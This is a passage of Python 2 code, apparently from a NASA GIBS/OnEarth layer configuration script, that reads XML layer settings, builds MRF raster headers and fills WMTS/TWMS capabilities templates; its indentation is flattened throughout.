err_msg = "ColorMapLocation for version '{0}' not defined for environment {1} - Trying colormap path {2}".format(
version, environmentConfig, colormap_value)
log_sig_warn(err_msg, sigevent_url)
if not url:
url = ''
err_msg = "ColorMapURL for version '{0}' not defined for environment {1} - Trying colormap path {2}".format(
version, environmentConfig, colormap_value)
log_sig_warn(err_msg, sigevent_url)
colormap.attributes['url'] = url
colormap.attributes['location'] = location
# Similar treatment as ColorMap for VectorStyleJSON
# Supporting "legacy" tag name for now
stylejson_elems = dom.getElementsByTagName('StyleJSON')
stylejson_elems.extend(dom.getElementsByTagName('VectorStyleJSON'))
stylejsons = []
for stylejson in stylejson_elems:
if stylejson.firstChild:
stylejsons.append(stylejson)
# Set default StyleJSON
default_stylejson = None
if stylejsons:
if len(stylejsons) == 1:
default_stylejson = stylejsons[0]
else:
for stylejson in stylejsons:
if 'default' in stylejson.attributes.keys() and stylejson.attributes['default'].value == 'true':
if default_stylejson is not None:
err_msg = 'Multiple <VectorStyleJSON> elements have "default=true" attribute but only one is allowed, using ' + stylejson.toxml()
log_sig_err(err_msg, sigevent_url)
default_stylejson = stylejson
if len(stylejsons) > 1 and default_stylejson is None:
default_stylejson = stylejsons[-1]
err_msg = 'Multiple <VectorStyleJSON> elements but none have "default=true" attribute, using ' + default_stylejson.toxml()
log_sig_err(err_msg, sigevent_url)
# Match <StyleJSONLocation> and <StyleJSONURL> to style json files with the same version and set them as attributes of the <VectorStyleJSON>
if stylejsons:
for stylejson in stylejsons:
if 'version' not in stylejson.attributes.keys():
stylejson.attributes['version'] = ''
stylejson_value = stylejson.firstChild.nodeValue
version = stylejson.attributes['version'].value
location = next(
(location.firstChild.nodeValue
for location in environment.stylejson_dirs
if location.attributes['version'].value == version), None)
url = next((url.firstChild.nodeValue
for url in environment.stylejsonUrls
if url.attributes['version'].value == version),
None)
if not location:
location = ''
err_msg = "StyleJSONLocation for version '{0}' not defined for environment {1} - Trying VectorStyleJSON path {2}".format(
version, environmentConfig, stylejson_value)
log_sig_warn(err_msg, sigevent_url)
if not url:
url = ''
err_msg = "StyleJSONURL for version '{0}' not defined for environment {1} - Trying VectorStyleJSON path {2}".format(
version, environmentConfig, stylejson_value)
log_sig_warn(err_msg, sigevent_url)
stylejson.attributes['url'] = url
stylejson.attributes['location'] = location
# Similar treatment as VectorStyleJSON for VectorMetadataJSON
metadatajson_elems = dom.getElementsByTagName('MetadataJSON')
metadatajson_elems.extend(dom.getElementsByTagName('VectorMetadataJSON'))
metadatajsons = []
for metadatajson in metadatajson_elems:
if metadatajson.firstChild:
metadatajsons.append(metadatajson)
# Set default VectorMetadataJSON
default_metadatajson = None
if metadatajsons:
if len(metadatajsons) == 1:
default_metadatajson = metadatajsons[0]
else:
for metadatajson in metadatajsons:
if 'default' in metadatajson.attributes.keys(
) and metadatajson.attributes['default'].value == 'true':
if default_metadatajson is not None:
err_msg = 'Multiple <VectorMetadataJSON> elements have "default=true" attribute but only one is allowed, using ' + metadatajson.toxml(
)
log_sig_err(err_msg, sigevent_url)
default_metadatajson = metadatajson
if len(metadatajsons) > 1 and default_metadatajson is None:
default_metadatajson = metadatajsons[-1]
err_msg = 'Multiple <VectorMetadataJSON> elements but none have "default=true" attribute, using ' + default_metadatajson.toxml(
)
log_sig_err(err_msg, sigevent_url)
# Match <MetadataJSONLocation> and <MetadataJSONURL> to metadata json files with the same version and set them as attributes of the <VectorMetadataJSON>
if metadatajsons:
for metadatajson in metadatajsons:
if 'version' not in metadatajson.attributes.keys():
metadatajson.attributes['version'] = ''
metadatajson_value = metadatajson.firstChild.nodeValue
version = metadatajson.attributes['version'].value
location = next(
(location.firstChild.nodeValue
for location in environment.metadatajson_dirs
if location.attributes['version'].value == version), None)
url = next((url.firstChild.nodeValue
for url in environment.metadatajsonUrls
if url.attributes['version'].value == version),
None)
if not location:
location = ''
err_msg = "MetadataJSONLocation for version '{0}' not defined for environment {1} - Trying VectorMetadataJSON path {2}".format(
version, environmentConfig, metadatajson_value)
log_sig_warn(err_msg, sigevent_url)
if not url:
url = ''
err_msg = "MetadataJSONURL for version '{0}' not defined for environment {1} - Trying VectorMetadataJSON path {2}".format(
version, environmentConfig, metadatajson_value)
log_sig_warn(err_msg, sigevent_url)
metadatajson.attributes['url'] = url
metadatajson.attributes['location'] = location
try:
emptyTile = get_dom_tag_value(dom, 'EmptyTile')
except:
emptyTile = None
try:
if emptyTile == None:
emptyTileOffset = dom.getElementsByTagName(
'EmptyTileSize')[0].attributes['offset'].value
else:
emptyTileOffset = dom.getElementsByTagName(
'EmptyTile')[0].attributes['offset'].value
except:
emptyTileOffset = 0
# Patterns
patterns = []
rest_patterns = []
patternTags = dom.getElementsByTagName('Pattern')
for pattern in patternTags:
try:
if pattern.attributes[
'type'].value == "WMTS-REST": # append WMTS REST patterns
rest_patterns.append(pattern.firstChild.data.strip())
else: # assume TWMS key-value pair
patterns.append(pattern.firstChild.data.strip())
except KeyError: # append if type does not exist
patterns.append(pattern.firstChild.data.strip())
# Time
if configuration_time:
times = configuration_time.split(',')
else:
times = []
timeTags = dom.getElementsByTagName('Time')
for time in timeTags:
try:
times.append(time.firstChild.data.strip())
except AttributeError:
times.append('')
# Set End Points
if environment.wmts_dir != None:
wmtsEndPoint = environment.wmts_dir
else: # default projection dir
wmtsEndPoint = lcdir + "/wmts/" + projection.id.replace(":", "")
if environment.twms_dir != None:
twmsEndPoint = environment.twms_dir
else:
# default projection dir
twmsEndPoint = lcdir + "/twms/" + projection.id.replace(":", "")
wmts_endpoints[wmtsEndPoint] = WMTSEndPoint(
wmtsEndPoint, cacheLocation_wmts, cacheBasename_wmts,
wmts_getCapabilities, projection)
twms_endpoints[twmsEndPoint] = TWMSEndPoint(
twmsEndPoint, cacheLocation_twms, cacheBasename_twms,
twms_getCapabilities, getTileService, projection)
wms_endpoints[environment.mapfileStagingLocation] = WMSEndPoint(
environment.mapfileStagingLocation, environment.mapfileLocation,
environment.mapfileLocationBasename,
environment.mapfileConfigLocation,
environment.mapfileConfigBasename)
# Close file.
config_file.close()
log_info_mssg('config: Identifier: ' + identifier)
log_info_mssg('config: Title: ' + title)
log_info_mssg('config: FileNamePrefix: ' + fileNamePrefix)
log_info_mssg('config: TiledGroupName: ' + tiledGroupName)
log_info_mssg('config: Compression: ' + compression)
log_info_mssg('config: TileMatrixSet: ' + tilematrixset)
if wmsSourceLoc:
log_info_mssg('config: WMSSourceLoc: ' + wmsSourceLoc)
if wmsGroupName:
log_info_mssg('config: WMSGroupName: ' + wmsGroupName)
if wmsLayerGroupName:
log_info_mssg('config: WMSLayerGroupName: ' + wmsLayerGroupName)
if emptyTile:
log_info_mssg('config: EmptyTile: ' + emptyTile)
if str(emptyTileSize) != "":
log_info_mssg('config: EmptyTileSize: ' + str(emptyTileSize))
log_info_mssg('config: EmptyTileOffset: ' + str(emptyTileOffset))
if headerFileName:
log_info_mssg('config: HeaderFileName: ' + headerFileName)
if archiveLocation:
log_info_mssg('config: ArchiveLocation static=' + str(static) +
' year=' + str(year) + ' subdaily=' + str(subdaily) +
': ' + archiveLocation)
if dataFileLocation:
log_info_mssg('config: DataFileLocation: ' + dataFileLocation)
if indexFileLocation:
log_info_mssg('config: IndexFileLocation: ' + indexFileLocation)
if zIndexFileLocation:
log_info_mssg('config: ZIndexFileLocation: ' + zIndexFileLocation)
if projection:
log_info_mssg('config: Projection: ' + str(projection.id))
if getTileService:
log_info_mssg('config: GetTileServiceLocation: ' + str(getTileService))
if wmts_getCapabilities:
log_info_mssg('config: WMTS GetCapabilitiesLocation: ' +
str(wmts_getCapabilities))
if twms_getCapabilities:
log_info_mssg('config: TWMS GetCapabilitiesLocation: ' +
str(twms_getCapabilities))
if cacheLocation_wmts:
log_info_mssg('config: WMTS CacheLocation: ' + str(cacheLocation_wmts))
if cacheLocation_twms:
log_info_mssg('config: TWMS CacheLocation: ' + str(cacheLocation_twms))
if cacheBasename_wmts:
log_info_mssg('config: WMTS Basename: ' + str(cacheLocation_wmts))
if cacheBasename_twms:
log_info_mssg('config: TWMS Basename: ' + str(cacheLocation_twms))
if wmtsEndPoint:
log_info_mssg('config: WMTSEndPoint: ' + str(wmtsEndPoint))
if twmsEndPoint:
log_info_mssg('config: TWMSEndPoint: ' + str(twmsEndPoint))
if tmsLimits:
log_info_mssg('config: TileMatrixSetLimits: ' + tmsLimits.toxml())
if colormaps:
for colormap in colormaps:
map_value = colormap.firstChild.nodeValue.strip()
log_info_mssg('config: ColorMap: ' + str(map_value))
if stylejsons:
for stylejson in stylejsons:
json_value = stylejson.firstChild.nodeValue.strip()
log_info_mssg('config: VectorStyleJSON: ' + str(json_value))
if metadatajsons:
for metadatajson in metadatajsons:
json_value = metadatajson.firstChild.nodeValue.strip()
log_info_mssg('config: VectorMetadataJSON: ' + str(json_value))
log_info_mssg('config: Patterns: ' + str(patterns))
if len(rest_patterns) > 0:
log_info_mssg('config: WMTS-REST Patterns: ' + str(rest_patterns))
if len(times) > 0:
log_info_mssg('config: Time: ' + str(times))
if archiveLocation != None:
archiveLocation = add_trailing_slash(archiveLocation)
# check if absolute path or else use relative to cache location
if archiveLocation[0] == '/':
mrfLocation = archiveLocation
else:
mrfLocation = cacheConfig + archiveLocation
archiveLocation = mrfLocation
else: # use archive location relative to cache if not defined
mrfLocation = add_trailing_slash(cacheConfig)
if year == True:
if archiveLocation != None:
mrfLocation = mrfLocation + 'YYYY/'
else:
mrfLocation = mrfLocation + fileNamePrefix + '/YYYY/'
if static == True:
mrf = mrfLocation + fileNamePrefix + '.mrf'
else:
if subdaily == True:
mrf = mrfLocation + fileNamePrefix + 'TTTTTTTTTTTTT_.mrf'
else:
mrf = mrfLocation + fileNamePrefix + 'TTTTTTT_.mrf'
if indexFileLocation == None:
if archiveLocation != None and archiveLocation[0] == '/':
# use absolute path of archive
indexFileLocation = mrf.replace('.mrf', '.idx')
else:
# use relative path to cache
indexFileLocation = mrf.replace(cacheConfig, '').replace(
'.mrf', '.idx')
if dataFileLocation == None:
if archiveLocation != None and archiveLocation[0] == '/':
# use absolute path of archive
dataFileLocation = mrf
else:
# use relative path to cache
dataFileLocation = mrf.replace(cacheConfig, '')
if compression.lower() in ['jpg', 'jpeg']:
dataFileLocation = dataFileLocation.replace('.mrf', '.pjg')
mrf_format = 'image/jpeg'
elif compression.lower() in ['tif', 'tiff']:
dataFileLocation = dataFileLocation.replace('.mrf', '.ptf')
mrf_format = 'image/tiff'
elif compression.lower() in ['lerc']:
dataFileLocation = dataFileLocation.replace('.mrf', '.lrc')
mrf_format = 'image/lerc'
elif compression.lower() in ['mvt']:
compression = "MVT"
dataFileLocation = dataFileLocation.replace('.mrf', '.pvt')
mrf_format = 'application/vnd.mapbox-vector-tile'
elif vectorType is not None:
dataFileLocation = dataFileLocation.replace('.mrf', '.shp')
else:
dataFileLocation = dataFileLocation.replace('.mrf', '.ppg')
mrf_format = 'image/png'
if zIndexFileLocation == None:
if archiveLocation != None and archiveLocation[0] == '/':
# use absolute path of archive
zIndexFileLocation = mrf
else:
# use relative path to cache
zIndexFileLocation = mrf.replace(cacheConfig, '')
zIndexFileLocation = zIndexFileLocation.replace('.mrf', '.zdb')
# Parse header filename. Default is to use the 'mrf' filename.
header_type = None
header_file_name = mrf
try:
headerFileName = dom.getElementsByTagName('HeaderFileName')[0]
header_file_name = get_dom_tag_value(dom, 'HeaderFileName')
except (AttributeError, IndexError):
pass
try:
header_type = headerFileName.getAttribute('type')
except AttributeError:
pass
if not vectorType:
# Open MRF header if one has been supplied (except if "type" attr is "prefix")
header_dom = None
if header_type != 'prefix':
try:
with open(header_file_name, 'r') as mrf_file:
try:
header_dom = xml.dom.minidom.parse(mrf_file)
except:
log_sig_err(
'Badly-formatted MRF header file: {0}'.format(
mrf_file), sigevent_url)
continue
except IOError:
log_sig_err(
"Can't open MRF file: {0}".format(header_file_name),
sigevent_url)
continue
# Create base MRF document. We'll be adding stuff from either the header MRF or the
# layer config file to this.
mrf_impl = xml.dom.minidom.getDOMImplementation()
mrf_dom = mrf_impl.createDocument(None, 'MRF_META', None)
mrf_meta = mrf_dom.documentElement
# Create <Raster> tag
raster_node = mrf_dom.createElement('Raster')
# If the "prefix" attribute of <HeaderFileName> is present, we grab MRF stuff from the
# layer config file. Otherwise, use the header file specified.
if header_type == 'prefix':
mrf_base = header_file_name + '.mrf'
header_dom = dom
log_info_mssg('Using MRF data within layer config file')
else:
log_info_mssg('Using MRF Archetype: ' + header_file_name)
mrf_base = os.path.basename(header_file_name)
if header_dom != None:
# Check if <Size> tag present and has all 3 required values (x,y,c)
try:
size_node = header_dom.getElementsByTagName('Size')[0]
except IndexError:
log_sig_err(
"<Size> tag not present in MRF header file or layer config",
sigevent_url)
continue
if size_node != None:
if not all(attr in size_node.attributes.keys()
for attr in ('x', 'y')):
log_sig_err("<Size> tag needs to have attributes x and y",
sigevent_url)
continue
else:
raster_node.appendChild(size_node)
bands = size_node.getAttribute('c')
# Create <Compression> node
compression_node = mrf_dom.createElement('Compression')
compression_text_node = mrf_dom.createTextNode(compression)
compression_node.appendChild(compression_text_node)
raster_node.appendChild(compression_node)
# Check if <DataValues> tag is present and the NoData attribute is present
try:
datavalues_node = header_dom.getElementsByTagName(
'DataValues')[0]
except IndexError:
datavalues_node = None
finally:
if datavalues_node is not None:
raster_node.appendChild(datavalues_node)
# Check if the <Quality> tag is present and of a valid type
try:
quality_node = header_dom.getElementsByTagName('Quality')[0]
except IndexError:
quality_node = None
if quality_node is not None:
if quality_node.firstChild.nodeValue >= 0 and quality_node.firstChild.nodeValue <= 100:
log_sig_err(
"<Quality> tag must be an integer between 1 and 100",
sigevent_url)
continue
else:
raster_node.appendChild(quality_node)
# Check if <PageSize> node is present and has c, x, and y attributes
try:
page_size_node = header_dom.getElementsByTagName('PageSize')[0]
except IndexError:
page_size_node = None
log_sig_err(
"<PageSize> tag not present in MRF header file or layer config",
sigevent_url)
continue
if page_size_node is not None:
if all(attr in page_size_node.attributes.keys()
for attr in ('x', 'y')):
raster_node.appendChild(page_size_node)
else:
log_sig_err("<PageSize> requires x, and y attributes",
sigevent_url)
continue
# Add <Raster> tag to MRF
mrf_meta.appendChild(raster_node)
# Create <Rsets>
try:
rsets_node = header_dom.getElementsByTagName('Rsets')[0]
except IndexError:
rsets_node = None
log_sig_err(
"<Rsets> tag not present in layer config or MRF header file",
sigevent_url)
continue
if rsets_node is not None:
try:
scale_attribute = rsets_node.getAttribute('scale')
except:
log_sig_err("Attribute 'scale' not present in <Rsets> tag",
sigevent_url)
continue
else:
try:
if scale_attribute:
if int(scale_attribute
) != projection.tilematrixsets[
tilematrixset].scale:
log_sig_err(
"Overview scales do not match - " +
tilematrixset + ": " + str(
str(projection.tilematrixsets[
tilematrixset].scale)) + ", " +
"Provided: " + scale_attribute,
sigevent_url)
continue
if projection.tilematrixsets[tilematrixset].levels > 1:
rsets_node.setAttribute(
'scale',
str(projection.tilematrixsets[tilematrixset].
scale))
except KeyError:
log_sig_err(
"Invalid TileMatrixSet " + tilematrixset +
" for projection " + projection.id, sigevent_url)
continue
# Add data file locations
dataFileNameElement = mrf_dom.createElement('DataFileName')
dataFileNameElement.appendChild(
mrf_dom.createTextNode(dataFileLocation))
indexFileNameElement = mrf_dom.createElement('IndexFileName')
indexFileNameElement.appendChild(
mrf_dom.createTextNode(indexFileLocation))
rsets_node.appendChild(dataFileNameElement)
rsets_node.appendChild(indexFileNameElement)
# Add zindex file name
has_zdb = False
if size_node.hasAttribute('z'):
z_index_node = mrf_dom.createElement('ZIndexFileName')
z_index_text_node = mrf_dom.createTextNode(zIndexFileLocation)
z_index_node.appendChild(z_index_text_node)
rsets_node.appendChild(z_index_node)
has_zdb = True
mrf_meta.appendChild(rsets_node)
# Create GeoTags
geotag_node = mrf_dom.createElement('GeoTags')
# Check for bounding box
try:
bounding_box_node = header_dom.getElementsByTagName(
'BoundingBox')[0]
except IndexError:
bounding_box_node = None
log_sig_err(
"<BoundingBox> tag not present in layer config or MRF header file",
sigevent_url)
continue
if bounding_box_node is not None:
if all(attr in bounding_box_node.attributes.keys()
for attr in ('minx', 'miny', 'maxx', 'maxy')):
geotag_node.appendChild(bounding_box_node)
else:
log_sig_err(
"<BoundingBox> requires minx, miny, maxx, and maxy attributes",
sigevent_url)
continue
mrf_meta.appendChild(geotag_node)
twms = mrf_dom.createElement('TWMS')
levelsElement = mrf_dom.createElement('Levels')
levelsElement.appendChild(
mrf_dom.createTextNode(
str(projection.tilematrixsets[tilematrixset].levels)))
# Get page sizes for TWMS pattern and/or empty tile generation
pageSize = mrf_dom.getElementsByTagName('PageSize')[0]
tileX = int(pageSize.getAttribute('x'))
tileY = int(pageSize.getAttribute('y'))
if emptyTile != None:
# Generate empty tile and override size if colormap is used
if default_colormap != None and skip_empty_tiles == False:
colormap_value = default_colormap.firstChild.nodeValue
colormap_location = default_colormap.attributes[
'location'].value
if colormap_location == '':
colormap_path = colormap_value
else:
colormap_path = add_trailing_slash(
colormap_location) + colormap_value
emptyTileSize = generate_empty_tile(colormap_path, emptyTile,
tileX, tileY)
else: # Override size if there is no colormap
try:
# Get file size
print "\nReading empty tile file: " + emptyTile
emptyTileSize = os.path.getsize(emptyTile)
print "Empty tile size: " + str(emptyTileSize)
except:
mssg = str().join(['Cannot read empty tile: ', emptyTile])
log_sig_err(mssg, sigevent_url)
emptyInfoElement = mrf_dom.createElement('EmptyInfo')
emptyInfoElement.setAttribute('size', str(emptyTileSize))
emptyInfoElement.setAttribute('offset', str(emptyTileOffset))
twms.appendChild(levelsElement)
twms.appendChild(emptyInfoElement)
# No longer used
# if colormap:
# metadataElement = mrf_dom.createElement('Metadata')
# metadataElement.appendChild(mrf_dom.createTextNode(colormap))
# twms.appendChild(twms.appendChild(metadataElement))
# add default TWMS patterns
twms_time_pattern = "request=GetMap&layers=%s&srs=%s&format=%s&styles=&time=[-0-9]*&width=%s&height=%s&bbox=[-,\.0-9+Ee]*" % (
identifier, str(projection.id), mrf_format.replace("/", "%2F"),
str(tileX), str(tileY))
twms_notime_pattern = "request=GetMap&layers=%s&srs=%s&format=%s&styles=&width=%s&height=%s&bbox=[-,\.0-9+Ee]*" % (
identifier, str(projection.id), mrf_format.replace("/", "%2F"),
str(tileX), str(tileY))
patterns.append(twms_time_pattern)
patterns.append(twms_notime_pattern)
patternElements = []
for pattern in patterns:
patternElements.append(mrf_dom.createElement('Pattern'))
patternElements[-1].appendChild(
mrf_dom.createCDATASection(pattern))
for patternElement in patternElements:
twms.appendChild(patternElement)
# Time elements
detected_times = []
if static == False:
for time in times:
detected_times += detect_time(time, archiveLocation,
fileNamePrefix, year, has_zdb)
timeElements = []
for detected_time in detected_times:
timeElements.append(mrf_dom.createElement('Time'))
timeElements[-1].appendChild(
mrf_dom.createTextNode(detected_time))
for timeElement in timeElements:
twms.appendChild(timeElement)
mrf_meta.appendChild(twms)
if projection:
projectionElement = mrf_dom.createElement('Projection')
projectionElement.appendChild(
mrf_dom.createCDATASection(projection.wkt))
mrf_meta.appendChild(projectionElement)
if not os.path.exists(twmsEndPoint):
os.makedirs(twmsEndPoint)
if not os.path.exists(wmtsEndPoint):
os.makedirs(wmtsEndPoint)
twms_mrf_filename = twmsEndPoint + '/' + mrf_base
twms_mrf_file = open(twms_mrf_filename, 'w+')
formatted_xml = get_pretty_xml(mrf_dom)
twms_mrf_file.write(formatted_xml)
twms_mrf_file.seek(0)
wmts_mrf_filename = wmtsEndPoint + '/' + mrf_base
# check if file already exists and has same TileMatrixSet, if not then create another file
if os.path.isfile(wmts_mrf_filename):
wmts_mrf_file = open(wmts_mrf_filename, 'r')
if tilematrixset not in wmts_mrf_file.read():
log_sig_warn(
tilematrixset + " not found in existing " +
wmts_mrf_filename +
". Creating new file for TileMatrixSet.", sigevent_url)
wmts_mrf_filename = wmts_mrf_filename.split(
".mrf")[0] + "_" + tilematrixset + ".mrf"
wmts_mrf_file.close()
wmts_mrf_file = open(wmts_mrf_filename, 'w+')
lines = twms_mrf_file.readlines()
# change patterns for WMTS
pattern_replaced = False
try:
if is_encoded:
wmts_pattern = "<![CDATA[SERVICE=WMTS&REQUEST=GetTile&VERSION=1.0.0&LAYER=%s&STYLE=(default|encoded)?&TILEMATRIXSET=%s&TILEMATRIX=[0-9]*&TILEROW=[0-9]*&TILECOL=[0-9]*&FORMAT=%s]]>" % (
identifier, tilematrixset, mrf_format.replace("/", "%2F"))
else:
wmts_pattern = "<![CDATA[SERVICE=WMTS&REQUEST=GetTile&VERSION=1.0.0&LAYER=%s&STYLE=(default)?&TILEMATRIXSET=%s&TILEMATRIX=[0-9]*&TILEROW=[0-9]*&TILECOL=[0-9]*&FORMAT=%s]]>" % (
identifier, tilematrixset, mrf_format.replace("/", "%2F"))
except KeyError:
log_sig_exit(
'ERROR', 'TileMatrixSet ' + tilematrixset +
' not found for projection: ' + projection.id, sigevent_url)
for line in lines:
if '<Pattern>' in line:
if pattern_replaced == False:
patternline = line.split('Pattern')
line = patternline[
0] + "Pattern>" + wmts_pattern + "</Pattern" + patternline[
-1]
pattern_replaced = True
else:
line = ''
wmts_mrf_file.write(line)
twms_mrf_file.close()
wmts_mrf_file.seek(0)
wmts_mrf_file.close()
try:
mrf_file.close()
except:
pass
print '\n' + twms_mrf_filename + ' configured successfully\n'
print '\n' + wmts_mrf_filename + ' configured successfully\n'
# generate legend if requested
legendUrl_svg_v_meta = ''
legendUrl_svg_h_meta = ''
legendUrl_png_h_url = None
if legend and default_colormap:
colormap_value = default_colormap.firstChild.nodeValue
colormap_location = default_colormap.attributes['location'].value
if colormap_location == '':
colormap_path = colormap_value
else:
colormap_path = add_trailing_slash(
colormap_location) + colormap_value
legend_identifier = os.path.splitext(colormap_value)[0]
legend_output = ''
try:
legend_output = environment.legend_dir + legend_identifier
except:
message = "Legend directory has not been defined for environment with cache location: " + environment.cache
log_sig_err(message, sigevent_url)
try:
if environment.legendUrl != None:
if legend_output != '':
# These URLs _are_ used in the WMTS capabilities
legendUrl_svg_v_meta, legendUrl_svg_v_width, legendUrl_svg_v_height = generate_legend(
colormap_path, legend_output + '_V.svg',
environment.legendUrl + legend_identifier + '_V.svg',
'svg', 'vertical')
legendUrl_svg_h_meta, legendUrl_svg_h_width, legendUrl_svg_h_height = generate_legend(
colormap_path, legend_output + '_H.svg',
environment.legendUrl + legend_identifier + '_H.svg',
'svg', 'horizontal')
# This URL _is not_ used in the WMTS capabilities
legendUrl_png_h_meta, legendUrl_png_h_width, legendUrl_png_h_height = generate_legend(
colormap_path, legend_output + '_H.png',
environment.legendUrl + legend_identifier + '_H.png',
'png', 'horizontal')
# saving this for later since WMS doesn't use the <LegendURL> metadata tag
legendUrl_png_h_url = environment.legendUrl + legend_identifier + '_H.png'
else:
message = "Legend URL has not been defined for environment with cache location: " + environment.cache
log_sig_err(message, sigevent_url)
except:
message = "Error generating legend for " + legend_identifier
log_sig_err(message, sigevent_url)
else: # Vectors
# Vectors aren't supporting z-slices
has_zdb = False
# Detect times for product based on layer configuration <Time> elements
detected_times = []
if static == False:
for time in times:
detected_times += detect_time(time, archiveLocation, fileNamePrefix, year, has_zdb)
# Clear legend variables
legendUrl_svg_v_meta = ''
legendUrl_svg_h_meta = ''
legendUrl_png_h_url = None
# generate archive links if requested
if links:
if len(detected_times) > 0:
print "Generating archive links for " + fileNamePrefix
generate_links(detected_times, archiveLocation, fileNamePrefix,
year, dataFileLocation, has_zdb)
else:
print fileNamePrefix + " is not a time varying layer"
# Modify service files
#getCapabilities TWMS
if no_twms == False:
try:
# Copy and open base GetCapabilities.
getCapabilities_file = twmsEndPoint + '/getCapabilities.xml'
shutil.copyfile(lcdir + '/conf/getcapabilities_base_twms.xml',
getCapabilities_file)
getCapabilities_base = open(getCapabilities_file, 'r+')
except IOError:
mssg = str().join([
'Cannot read getcapabilities_base_twms.xml file: ',
lcdir + '/conf/getcapabilities_base_twms.xml'
])
log_sig_exit('ERROR', mssg, sigevent_url)
else:
lines = getCapabilities_base.readlines()
for idx in range(0, len(lines)):
if '<SRS></SRS>' in lines[idx]:
lines[idx] = lines[idx].replace(
'<SRS></SRS>', '<SRS>' + projection.id + '</SRS>')
if '<CRS></CRS>' in lines[idx]:
lines[idx] = lines[idx].replace(
'<CRS></CRS>', '<CRS>' + projection.id + '</CRS>')
if 'OnlineResource' in lines[idx]:
spaces = lines[idx].index('<')
onlineResource = xml.dom.minidom.parseString(
lines[idx]).getElementsByTagName('OnlineResource')[0]
if 'KeywordList' in lines[idx - 1]:
onlineResource.attributes[
'xlink:href'] = twmsServiceUrl # don't include the cgi portion
else:
onlineResource.attributes[
'xlink:href'] = twmsServiceUrl + "twms.cgi?"
lines[idx] = (' ' * spaces) + onlineResource.toprettyxml(
indent=" ")
getCapabilities_base.seek(0)
getCapabilities_base.truncate()
getCapabilities_base.writelines(lines)
getCapabilities_base.close()
#getTileService
if no_twms == False:
try:
# Copy and open base GetTileService.
getTileService_file = twmsEndPoint + '/getTileService.xml'
shutil.copyfile(lcdir + '/conf/gettileservice_base.xml',
getTileService_file)
getTileService_base = open(getTileService_file, 'r+')
except IOError:
mssg = str().join([
'Cannot read gettileservice_base.xml file: ',
lcdir + '/conf/gettileservice_base.xml'
])
log_sig_exit('ERROR', mssg, sigevent_url)
else:
lines = getTileService_base.readlines()
for idx in range(0, len(lines)):
if 'BoundingBox' in lines[idx]:
lines[idx] = lines[idx].replace(
"BoundingBox", "LatLonBoundingBox").replace(
"{minx}", projection.lowercorner[0]).replace(
"{miny}", projection.lowercorner[1]).replace(
"{maxx}",
projection.uppercorner[0]).replace(
"{maxy}", projection.uppercorner[1])
if 'OnlineResource' in lines[idx]:
spaces = lines[idx].index('<')
onlineResource = xml.dom.minidom.parseString(
lines[idx]).getElementsByTagName('OnlineResource')[0]
if 'KeywordList' in lines[idx - 1]:
onlineResource.attributes[
'xlink:href'] = twmsServiceUrl # don't include the cgi portion
else:
onlineResource.attributes[
'xlink:href'] = twmsServiceUrl + "twms.cgi?"
lines[idx] = (' ' * spaces) + onlineResource.toprettyxml(
indent=" ")
getTileService_base.seek(0)
getTileService_base.truncate()
getTileService_base.writelines(lines)
getTileService_base.close()
#getCapabilities WMTS modify Service URL
if no_wmts == False:
try:
# Copy and open base GetCapabilities.
getCapabilities_file = wmtsEndPoint + '/getCapabilities.xml'
shutil.copyfile(lcdir + '/conf/getcapabilities_base_wmts.xml',
getCapabilities_file)
getCapabilities_base = open(getCapabilities_file, 'r+')
except IOError:
mssg = str().join([
'Cannot read getcapabilities_base_wmts.xml file: ',
lcdir + '/conf/getcapabilities_base_wmts.xml'
])
log_sig_exit('ERROR', mssg, sigevent_url)
else:
lines = getCapabilities_base.readlines()
for idx in range(0, len(lines)):
if '<ows:Get' in lines[idx]:
spaces = lines[idx].index('<')
getUrlLine = lines[idx].replace(
'ows:Get',
'Get xmlns:xlink="http://www.w3.org/1999/xlink"'
).replace('>', '/>')
getUrl = xml.dom.minidom.parseString(
getUrlLine).getElementsByTagName('Get')[0]
if '1.0.0/WMTSCapabilities.xml' in lines[idx]:
getUrl.attributes[
'xlink:href'] = wmtsServiceUrl + '1.0.0/WMTSCapabilities.xml'
elif 'wmts.cgi?' in lines[idx]:
getUrl.attributes[
'xlink:href'] = wmtsServiceUrl + 'wmts.cgi?'
else:
getUrl.attributes['xlink:href'] = wmtsServiceUrl
lines[idx] = (' ' * spaces) + getUrl.toprettyxml(
indent=" ").replace('Get', 'ows:Get').replace(
' xmlns:xlink="http://www.w3.org/1999/xlink"',
'').replace('/>', '>')
if 'ServiceMetadataURL' in lines[idx]:
spaces = lines[idx].index('<')
serviceMetadataUrlLine = lines[idx].replace(
'ServiceMetadataURL',
'ServiceMetadataURL xmlns:xlink="http://www.w3.org/1999/xlink"'
)
serviceMetadataUrl = xml.dom.minidom.parseString(
serviceMetadataUrlLine).getElementsByTagName(
'ServiceMetadataURL')[0]
serviceMetadataUrl.attributes[
'xlink:href'] = wmtsServiceUrl + '1.0.0/WMTSCapabilities.xml'
lines[idx] = (
' ' * spaces
) + serviceMetadataUrl.toprettyxml(indent=" ").replace(
' xmlns:xlink="http://www.w3.org/1999/xlink"', '')
getCapabilities_base.seek(0)
getCapabilities_base.truncate()
getCapabilities_base.writelines(lines)
getCapabilities_base.close()
# create WMTS layer metadata for GetCapabilities
if no_wmts == False and vectorType is None:
try:
# Open layer XML file
layer_xml = open(wmts_mrf_filename.replace('.mrf', '.xml'), 'w+')
except IOError:
mssg = str().join([
'Cannot read layer XML file: ',
wmts_mrf_filename.replace('.mrf', '.xml')
])
log_sig_exit('ERROR', mssg, sigevent_url)
wmts_layer_template = """<Layer>
<ows:Title xml:lang=\"en\">$Title</ows:Title>
$BoundingBox
<ows:Identifier>$Identifier</ows:Identifier>
<ows:Metadata xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/metadata-type/colormap$MapVersion" xlink:href="$ColorMap" xlink:title="GIBS Color Map: Data - RGB Mapping"/>
<ows:Metadata xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/metadata-type/mapbox-gl-style$MapVersion" xlink:href="$VectorStyleJSON" xlink:title="Mapbox GL Layer Styles"/>
<ows:Metadata xlink:type="simple" xlink:role="http://earthdata.nasa.gov/gibs/metadata-type/layer$MapVersion" xlink:href="$VectorMetadataJSON" xlink:title="Layer Vector Metadata"/>
<Style isDefault="true">
<ows:Title xml:lang=\"en\">default</ows:Title>
<ows:Identifier>default</ows:Identifier>
$LegendURL_vertical
$LegendURL_horizontal
</Style>
<Format>$Format</Format>
<Dimension>
<ows:Identifier>Time</ows:Identifier>
<ows:UOM>ISO8601</ows:UOM>
<Default>$DefaultDate</Default>
<Current>false</Current>
<Value>$DateRange</Value>
</Dimension>
